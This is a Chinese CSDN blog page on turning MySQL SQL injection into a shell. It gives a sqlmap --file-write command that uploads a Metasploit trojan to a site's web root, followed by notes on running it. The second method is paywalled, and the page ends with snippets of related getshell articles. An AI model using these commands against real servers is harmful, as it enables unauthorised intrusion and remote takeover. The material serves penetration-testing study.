MySQL数据库注入Getshell

最新推荐文章于 2024-08-20 09:07:08 发布

谢公子

最新推荐文章于 2024-08-20 09:07:08 发布

阅读量4.6k

点赞数

分类专栏：数据库

本文链接：https://blog.csdn.net/qq_36119192/article/details/105651535

版权

数据库专栏收录该内容

13 篇文章 30 订阅

订阅专栏

方法一：直接写入木马，执行

方法二：找到网站绝对路径，写入木马

利用场景：当前是 root 用户，且通过 --os-shell 可以执行一部分少数的命令，很多命令没有回显，也不能执行powershell命令反弹木马。

方法一：直接写入木马，执行

由于通过SQLmap注入MySQL类型的网站，--os-shell 参数无法执行远程下载的命令，所以我们可以本地写入木马文件。

sqlmap -u "http://192.168.10.20:88/index.php?id=1" -p id --dbms="MySQL" --batch --file-write msf.exe --file-dest "C:\phpstudy\WWW\msf.exe"

然后通过os-shell直接执行该msf.exe木马文件，我们的MSF就可以收到shell了。

方法二：找到网站绝对路径，写入木马

如果第一种方法不能执行木马文件或者执行完之后我们收不到shell。这种情况的话，就必须得找到网站绝对路径写入木马了。

关注博主即可阅读全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

谢公子

关注关注

0
点赞
踩
3

收藏

觉得还不错? 一键收藏
打赏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

mysql进行getshell方法

m0_55772907的博客

11-19

2149

getshell

Mysql注入思路＋编写脚本批量dump数据+getshell——SQL注入

CC__Faker的博客

06-17

1526

目录前言0x00 sql注入测试0x0001 注点判断0x0002 回显字段判断0x0003 函数注入0x0004 数据获取0x01 数据下载0x0100 思路0x0101 获取页面0x0102 正则提取0x0103 获取一组数据0x0104 获取多组数据并写入0x0105 程序运行前言本次渗透测试的目的是为了验证SQL注入的危害和对联合查询注入流程的详细讲解，以及编写脚本批量下载。环境：sqli-labs less-1，phpstduy 工具：蚁剑、pycharm 0x00 sql注入测试 0x

参与评论您还未登录，请先登录后发表或查看评论

mysql注入提权命令

12-03

mysql注入提权命令 php类型的网站很多都存在MYSQL注入漏洞，而利用注入来获取权限的方法又多种多样。本文以mysql中支持的SCHEMATA库为例讲述mysql注入高级暴库用户密码

sql怎么继续编辑已经保存的代码_某团购CMS的GETSHELL操作代码审计

weixin_39673051的博客

12-06

114

作者：会上树的猪合天智汇 0x00 写点废话在渗透测试中，获取一个webshell应该是我们不屑的追求，今天要通过这个CMS从代码的角度看一下可利用的getshell的方法。这一次的代码审计需要借助工具来定位可能存在的漏洞点，选择Seay源代码审计系统。步入正题。0x01文件上传getshell：1、/kindupload.php：通过获取文件最后一个扩展名进行白名单匹配，且添加随...

getshell开源项目安装与使用指南

最新发布

gitblog_01079的博客

08-20

247

getshell开源项目安装与使用指南 getshell各大平台提权工具项目地址:https://gitcode.com/gh_mirrors/ge/getshell 项目概述该项目getshell托管在GitHub上，地址为:https://github.com/klsfct/getshell.git。然而，提供的引用内容并未直接提供关于特定开源项目getshell的详细信息，包括其目录结构...

mysql 开启日志写shell_Phpmyadmin写日志getshell

weixin_39531378的博客

01-19

602

这个算是一个很常见也很基础的getshell的方式，昨天有个小伙伴问到我这个问题，说面试的时候主管给了他一个phpmyadmin登录入口，让他getshell，由于实战经验较少，小伙伴那道题没拿到分。其实，看到phpmyadmin，第一反应就应该是写日志getshell。为了防止大家继续踩坑，特地科普一波。大家看了以后记得在本地phpstudy环境内动手测试一下，以免后面再遇到这类面试题不知道怎么...

从MySql注入到GetShell

Williamanddog的博客

01-17

599

在mysql数据库中存在mysql select into outfile命令，该命令的作用是将被选择的一行写入一个文件。（2）要有mysql file权限（即能否对系统的文件读取和写操作），默认情况下只有root权限有。在配置文件中，我们可以看到数据库的用户名为root，密码为p@ssw0rd。（3）对目录要有写权限，一般image之类的存放图片的目录有写权限。还要注意：写的文件名一定是在网站中不存在的，不然会失败。然后我们通过蚁剑的数据连接就可以进入数据库。然后我们进入config目录查看配置文件。

mysql注入到命令执行 | 提权

Sp4rkW的博客

03-01

4108

文章首发公众号：闪光的自留地知乎：Sp4rkW GITHUB：Sp4rkW B站：一只技术君博客：https://sp4rkw.blog.csdn.net/ 联系邮箱：getf_own@163.com 前言这篇博客主要是最近面试遇到的

postgresql进行getshell

m0_55772907的博客

11-22

1680

getshell

渗透测试靶机实战-SQL注入getshell

yummy11111的博客

07-18

895

SQL注入getshell靶机实战

mysql写shell

weixin_47385895的博客

08-22

1975

mysql常见写shell方法

mysql root getshell_有数据库root帐号怎么getshell？

weixin_39988476的博客

01-19

177

win7移动、复制和删除文件时总提示用户需要计算机管理员提供的权限才能对此文件进行更改的解决步骤：1、打开记事本，输入下列文本：Windows Registry Editor Version 5.00[HKEY_CLASSES_ROOT\*\shell\runas]@="获取权限""NoWorkingDirectory"=""[HKEY_CLASSES_ROOT\*\shell\runas\com...

SQL注入命令执行

qq_50034496的博客

07-06

1506

SQL注入命令执行

SQLmap上传脚本getshell

weixin_43006749的博客

08-29

5332

sqlmap简介 sqlmap是一个渗透测试工具，可以用来进行自动化检测，利用SQL注入漏洞，获取数据库服务器的权限。它有功能强大的检测引擎,针对各种数据库的渗透测试的功能选项，能够获取数据库中存储的数据，访问操作系统文件,执行操作系统命令等。以下是简单的参数介绍: 请求命令注释 –date=DATE #通过post发送数据: –cookie=COOKIE #cookie头的值 –user-...

Mysql注入详细讲解

2401_84466359的博客

05-24

1424

*原理：**用户向数据库里存入恶意的数据，在数据被插入到数据库之前，肯定会对数据库进行转义处理，但用户输入的数据的内容肯定是一点摸样也不会变的存进数据库里，而一般都默认为数据库里的信息都是安全的，查询的时候不会进行处理，所以当用户的恶意数据被web程序调用的时候就有可能出发SQL注入。GET/POST提交数据时，发现提交的数据被加密了（可能js加密），那么在提交数据前，抓包，解密，将注入语句写好，然后将整个语句进行加密（相同加密算法），再将数据发过去。HTTP 头注入常常发生在程序采集用户信息的模块中。

sql注入 mysql 执行命令 sql注入以及解决的办法

QQ3007250950的博客

07-23

1163

所以后面的where条件是一个恒等式，表所有的行都符合字符串1等于字符串1这个条件，又是或的关系，所以所有的行全部匹配，全部被搜索出来，这样再用行数来判断用户是否能登陆已经根本不行了，因为查出来的是所有行。这句超级简单吧，我们都知道，这句最常用的是在登陆的时候，来查询用户输入的账号和密码匹配不匹配，来确定用户是否可以登陆的，大体上一看好像没啥问题，但是呢，假如我是一名黑客，我可以用一种巧妙地方式来登陆你这个系统，我账号随意输入一个，密码我输入一个 1 ‘or’ 1’='1 什么意思呢？

MySQL命令\注入

weixin_46928280的博客

07-25

1480

使用MySQL从建库、建表，对数据的增删改查，删库、删表跑路等基本命令进行注入！！！

mysql 常用注入命令_sql注入之必备的基础知识

weixin_36299790的博客

01-26

514

什么是SQL注入(SQL Injection)所谓SQL注入式攻击，就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串，欺骗服务器执行恶意的SQL命令。在某些表单中，用户输入的内容直接用来构造(或者影响)动态SQL命令，或作为存储过程的输入参数，这类表单特别容易受到SQL注入式攻击。mysql常用注释#--[空格]或者是--+/*…*/在注意过程中，这些注释可能都需要进行urle...

SQL注入GetShell的方法（1）

forinput的博客

05-06

4127

SQL注入getshell的五中方式

mysql数据库定时备份shell脚本

05-25

下面是一个简单的 MySQL 数据库定时备份 shell 脚本： ```bash #!/bin/bash # MySQL 数据库备份目录 backup_dir="/backup/mysql" # MySQL 数据库用户名和密码 mysql_user="your_mysql_username" mysql_password=...